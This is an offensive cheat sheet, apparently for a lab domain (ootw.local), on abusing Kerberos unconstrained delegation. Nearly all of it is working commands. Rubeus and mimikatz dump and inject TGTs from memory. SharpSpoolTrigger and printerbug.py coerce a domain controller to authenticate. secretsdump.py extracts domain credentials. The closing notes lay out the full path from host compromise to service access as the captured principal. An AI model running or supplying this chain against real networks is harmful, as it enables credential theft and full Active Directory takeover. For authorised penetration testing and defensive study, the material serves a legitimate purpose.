Unconstrained delegation is abused by compromising a host configured with TRUSTED_FOR_DELEGATION, then extracting delegated TGTs from memory when users or computers authenticate to services on that host.
Find targets
ldapsearch -LLL -x -H ldap://10.10.10.200 -D "ootw.local\\student" -w 'student' -b "DC=ootw,DC=local" '(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))' sAMAccountName dNSHostName servicePrincipalName
findDelegation.py ootw.local/student:'student' -dc-ip 10.10.10.200
Monitor for tickets on the compromised delegated host
Rubeus.exe monitor /interval:5 /nowrap
Rubeus.exe monitor /interval:5 /nowrap /targetuser:Administrator
Dump cached tickets
Rubeus.exe dump /nowrap
Rubeus.exe dump /luid:0x3e7 /service:krbtgt /nowrap
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"
Inject captured ticket
Rubeus.exe ptt /ticket:<BASE64_TICKET>
klist
dir \\dc01.ootw.local\c$
Coerce a high-value computer to authenticate
SharpSpoolTrigger.exe dc01.ootw.local delegated-host.ootw.local
PrinterBug from Linux
printerbug.py ootw.local/student:'student'@dc01.ootw.local delegated-host.ootw.local
Use captured ticket from Linux after conversion
ticketConverter.py captured.kirbi captured.ccache
export KRB5CCNAME=./captured.ccache
klist
secretsdump.py -k -no-pass ootw.local/Administrator@dc01.ootw.local -dc-ip 10.10.10.200
Notes
Domain controllers are configured for unconstrained delegation by design. They are not the finding. Non-DC servers with unconstrained delegation are the dangerous targets.
The cleanest path is host compromise, ticket monitoring, authentication coercion, ticket injection, then service access as the captured principal.